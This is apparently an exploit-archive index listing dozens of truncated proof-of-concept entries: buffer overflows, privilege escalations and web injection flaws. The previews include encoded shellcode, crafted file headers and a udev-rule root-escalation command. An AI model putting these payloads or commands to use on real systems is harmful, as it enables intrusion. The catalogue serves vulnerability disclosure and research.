WordPress Plugin Cforms 14.7 - Remote Code Execution

WordPress Plugin Cforms 14.7 - Remote Code Execution Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Date: 2015-01-19 Exploit Author: Zakhar Vendor Homepage: https://wordpress.org/plugins/cforms2/ Software Link: https://downloads.wordpress.org/plugin/cforms2.zip...

Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution

Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution var payloadlength = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = ""; var buf2 = ""; //offset to SE is 156, initial analysis using metasploit cyclic pattern for i=0; i...

Congstar Internet Manager - Local Buffer Overflow (SEH)

Congstar Internet Manager - Local Buffer Overflow SEH !/usr/bin/python Exploit Title:Congstar Internet-Manager SEH Buffer Overflow Software for usb Wireless:Congstar Prepaid Internet-Stick MF100 Homepage:www.congstar.de/downloads/prepaid-internet-stick/ Software...

Microsoft Windows 8.1 (x86x64) - User Profile Service Privilege Escalation (MS15-003)

Microsoft Windows 8.1 x86x64 - User Profile Service Privilege Escalation MS15-003 Source: https://code.google.com/p/google-security-research/issues/detail?id=123 Platform: Windows 8.1 Update 32/64 bit No other OS tested When a user logs into a computer the User Profile Service is used to create...

Lorex LH300 Series - ActiveX Buffer Overflow (PoC)

Lorex LH300 Series - ActiveX Buffer Overflow PoC Disclosure: 09/01/2014 / Last updated: 18/01/2015 Hi, I have discovered a buffer overflow vulnerability that allows remote code execution in an ActiveX control bundled by a manufacturer of video surveillance systems. The company is Lorex...

T-Mobile Internet Manager - Local Buffer Overflow (SEH)

T-Mobile Internet Manager - Local Buffer Overflow SEH !/usr/bin/python coding: utf-8 Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow Version:Internet Manager Software für Windows TMOPCV1.0.5B06 Software for usb Wireless:T-Mobile web'n'walk Stick Fusion...

WordPress Plugin Pie Register 2.0.13 - Privilege Escalation

WordPress Plugin Pie Register 2.0.13 - Privilege Escalation Exploit Title: Pie Register 2.0.13 Privilege escalation Date: 16-10-2014 Software Link: https://wordpress.org/plugins/pie-register/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl...

Sim Editor 6.6 - Local Stack Buffer Overflow

Sim Editor 6.6 - Local Stack Buffer Overflow include include include define SIZE 65536 / Title: Sim Editor v6.6 Stack Based Buffer Overflow Version: 6.6 Tested on: Windows XP sp2 en, Windows 8 64-bit Date: 16-01-2015 Author: Osanda Malith Jayathissa E-Mail: osandacatunseen.is Website:...

ManageEngine Desktop Central - Create Administrator

ManageEngine Desktop Central - Create Administrator Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP Discovered by Pedro Ribeiro [email protected], Agile Information Security =================================================================================...

Dell-iDRAC-IPMI-1.5

Dell iDRAC IPMI v1.5 Implementation contains a flaw that is triggered as session IDs are assigned incrementally rather than randomly, and limit the overall pool. This may allow a remote attacker trivially predict session IDs, hijack a session, and inject arbitrary commands. from time import sleep...

Ansible Tower 2.0.2 - Multiple Vulnerabilities

Ansible Tower 2.0.2 - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Privilege Escalation & XSS & Missing Authentication product: Ansible Tower vulnerable version: =2.0.5 impact: high homepage...

Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC)

Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash PoC / crash-issue2.c: Written for Mac OS X Yosemite 10.10 by @rpaleari and @joystick. Triggers a panic overwriting a stackcanary. gcc -Wall -o crash-issue2,.c -framework IOKit / include include include include include include struc...

Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC)

Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash PoC / lpe-issue1.c Written for Mac OS X Yosemite 10.10.1 by @joystick and @rpaleari. Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey gcc -Wall -o lpe-issue1,.c -framework IOKit / include include include include...

Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness

Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness """ For testing purposes only. c Yong Chuan, Koh 2014 """ from time import sleep from socket import from struct import from random import import sys, os, argparse HOST = None PORT = 623 bufsize = 1024 recv = "" create socket UDPsock =...

Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC)

Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash PoC / crash-issue3.c: Written for Mac OS X Yosemite 10.10 by @rpaleari and @joystick. Exploits a missing check in IOBluetoothHCIController::TransferACLPacketToHW to trigger a panic. gcc -Wall -o crash-issue3,.c -framework IOKit / include...

Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC)

Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash PoC / crash-issue1.c: Written for Mac OS X Yosemite 10.10 by @rpaleari and @joystick. Exploits a missing check in IOBluetoothHCIUserClient::DispatchHCICreateConnection causing a panic. gcc -Wall -o crash-issue1,.c -framework IOKit ...

Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities

Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities Document Title: =============== Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1400 Release Date: ============= 2015-01-12 Vulnerability...

Gecko CMS 2.3 - Multiple Vulnerabilities

Gecko CMS 2.3 - Multiple Vulnerabilities Gecko CMS 2.3 Multiple Vulnerabilities Vendor: JAKWEB Product web page: http://www.cmsgecko.com Affected version: 2.3 and 2.2 Summary: Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been build to...

RedStar-3.0-Desktop-Escalation

Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo 'RUN+="/bin/bash /tmp/r00t.sh"' /etc/udev/rules.d/85-hplj10xx.rules cat...

Exploit-Tutorial-1

This is a module that will help you learn the basics of exploit development, the focus on this one is a stack-buffer type of overflow and the platform used is GNU/Linux. Basic Buffer Overflow for Linux - Part of the Exploit Pack Tutorials The following exploit code has been written in Python and...

RedStar 3.0 Desktop - Software Manager swmng.app Local Privilege Escalation

RedStar 3.0 Desktop - Software Manager swmng.app Local Privilege Escalation The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. UnFortunately, they left a big security hole: the Software Manager swmng.app, which runs as root through sudo and will install a...

RedStar 3.0 Desktop - Enable sudo Privilege Escalation

RedStar 3.0 Desktop - Enable sudo Privilege Escalation !/bin/bash -e Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo...

RedStar 2.0 Desktop - World-writeable rc.sysinit Local Privilege Escalation

RedStar 2.0 Desktop - World-writeable rc.sysinit Local Privilege Escalation Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here...

D-Link DSL-2730B Modem - Lancfg2get.cgi Persistent Cross-Site Scripting

D-Link DSL-2730B Modem - Lancfg2get.cgi Persistent Cross-Site Scripting Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored Date: 11-01-2015 Exploit Author: Mauricio Correa Vendor Homepage: www.dlink.com Hardware version: C1 Version: GE 1.01 Tested on: Windows 8 and...

D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd

D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored Date: 11-01-2015 Exploit Author: Mauricio Correa Vendor Homepage: www.dlink.com Hardware version: C1 Version: GE 1.01 Tested on: Windows 8 an...

D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl Wlsecurity.wl

D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl Wlsecurity.wl Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored Date: 11-01-2015 Exploit Author: Mauricio Correa Vendor Homepage: www.dlink.com Hardware version: C1...

Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation

Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation / Source: https://code.google.com/p/google-security-research/issues/detail?id=121 / / tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions! this poc uses liblorgnette to resolve some private...

Palringo 2.8.1 - Local Stack Buffer Overflow

Palringo 2.8.1 - Local Stack Buffer Overflow !/use/bin/perl Exploit Title: ‫palringo stack buffer overflow Date: 10 January 2015 Vulnerability discovered by: Mr.ALmfL9 Vendor Homepage: http://www.palringo.com/ Software Link: http://www.palringo.com/ar/sa/download/?get=winpc Version: 2.8.1 Tested...

vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion SQL Injection Cross-Site Scripting

vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion SQL Injection Cross-Site Scripting Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion, SQL Injection & XSS Date: January 8, 2015 Exploit Author: Technidev https://technidev.com Vendor Homepage: https://vbulletin.com Software...

Windows-Kerberos-MS14-068

Microsoft Windows Server contains a flaw related to the checksum in the Kerberos Key Distribution Center KDC component. The issue is triggered when the component fails to properly validate signatures. This may allow an authenticated remote attacker to use a forged Kerberos ticket signature to gai...

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload...

Ntpdc 4.2.6p3 - Local Buffer Overflow

Ntpdc 4.2.6p3 - Local Buffer Overflow Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/ from os import system, environ from struct import pack import sys ntpdc 4.2.6p3 bof @dronesec tested on x86 Ubuntu 12.04.5 LTS IMAGEBASE = 0x80000000 LDINITIALOFFSET = 8900 LDTAILOFFSET = 1400...

Mini-stream-Ripper-3.0.1.1-(.m3u)

Mini-stream Ripper 3.0.1.1 .m3u Buffer Overflow Code Execution Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe Author: l3D Site: http://xraysecurity.blogspot.com nops1='\x90'0x2a80 system"calc" - Metasploit.com...

QuickZip-4.x-(.zip)

Exploit Title : QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit Date : 9/3/2010 Author : corelanc0d3r mrme Bug found by : corelanc0d3r http://corelan.be:8800/ Software Link : http://www.quickzip.org/downloads.html Version : 4.60 header1 =...

Stud_PE-2.6.05

Exploit Title: StudPE v2.6.05 Stack Overflow PoC exploit Date: 03/28/2010 Author: zha0 Software Link: http://www.cgsoftlabs.ro/studpe.html Version: StudPE v2.6.05 peexe= "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00"...

KenWards-Zipper-1.400

This exploit takes advantage of the fact too many characters get mangled, as a result I was able to get a shell in a more straight forward way. Very interesting exercise. Mrme and tecR0c figured out this trick, of course. But I was given the honor to share it. Zip file format based on:...

Kenward-Zipper-1.4

Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit Date : 23/3/2010 Bug found by : corelanc0d3r http://www.corelan.be:8800/ Author : mrme http://net-ninja.net/ Software Link : http://www.trans4mind.com/personaldevelopment/zipper/ Version : 1.4 ldfheader =...

Crimson-Editor-r3.70-SEH

Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit Date : 21/03/2010 Author : mrme Bug found by : sharpe Version : 3.70 Release header =...

ZippHo-3.0.6-(.zip)

ZippHo 3.0.6 .zip 0day stack buffer overflow PoC exploit Author: mrme - http://net-ninja.net/ http://twitter.com/StevenSeeley Download: http://www.brothersoft.com/zippho-71295.html Platform: Windows XP sp3 En local file header lfheader =...

Adobe-Reader-PDF-LibTiff

Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: 8.3.0, 9.3.0 CVE: 2010-0188 import sys import base64 import struct import zlib import StringIO SHELLCODEOFFSET=0x555 TIFFOFSET=0x2038 windows/exec - 227 bytes http://www.metasploit.com Encoder:...

Avast!-4.7-aavmker4.sys

avast! 4.7 aavmker4.sys privilege escalation http://www.trapkit.de/advisories/TKADV2008-002.txt CVE-2008-1625 from ctypes import import time, struct, sys, thread, os kernel32 = windll.kernel32 Psapi = windll.Psapi def findSysBasedrv: print "+ Retrieving %s base address..." % drv ARRAYSIZE = 1024...

IDEAL-Administration-2010-10.2

IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit Found By: DrIDE Usage: Migrate Open Migration Project Bind Shell Download: www.pointdev.com sc = "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"...

IDEAL-Migration-2009-4.5.1

IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit Found By: DrIDE Usage: Right Click First Element in tree Open Migration Project Bind Shell Download: www.pointdev.com sc = "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"...

TweakFS-1.0-(FSX-Edition)

Bug found by : TecR0c Software Link : http://tweakfs.com/ Version : 1.0 OS : Windows Tested on : XP SP3 En VirtualBox Type of vuln : Direct RET / SEH ldfheader = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\xe4\x0f" "\x00\x00\x00"...

Archive-Searcher-(.zip)

Software : Archive Searcher 2.1 Author : Lincoln OS : Windows Tested on : XP SP3 En VirtualBox Zip Headers header1= "\x50\x4b\x03\x04\x14\x00\x00\x00" + "\x00\x00\xb7\xac\xce\x34\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xe4\x0f\x00\x00\x00" header2= "\x50\x4b\x01\x02\x14\x00\x14\x00"...

Linux-Kernel-2.6.34-rc3

The kernel allows processes to access the internal .reiserfspriv directory at the top of a reiserfs filesystem which is used to store xattrs. Permissions are not enforced in that tree, so unprivileged users can view and potentially modify the xattrs on arbitrary files. import os, sys SHELL = 'int...

Castripper-2.50.70-(.pls)

Castripper 2.50.70 .pls stack buffer overflow w/ DEP bypass exploit Author: mrme - https://net-ninja.net - mrme AT corelan.be Download: http://www.mini-stream.net/castripper/ def banner: print "|------------------------------------------------------------------|" print "| |" print "| / / / / |"...

VUPlayer-2.49---(.m3u)

VUPlayer 2.49 .M3u Universal buffer overflow exploit w/ DEP bypass Author: mrme Download: http://vuplayer.com/ Tested on Wind0ws XP SP3 /noexecute=alwayson sc = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"...

Audio-Converter-8.1

Author : Sud0 Bug found by : chap0 Software Link : http://download.cnet.com/Audio-Converter/3000-21404-10045287.html Version : 8.1 OS : Windows import socket shellcode running calc.exe alpha2 encoded basereg edx...

Mediacoder-0.7.3.4672

Title: Mediacoder v0.7.3.4672 SEH Exploit Author: Stoke from devilc0de crew http://hack2web.altervista.org http://devilc0de.altervista.org shell = "\x89\xe2\xdb\xcb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"...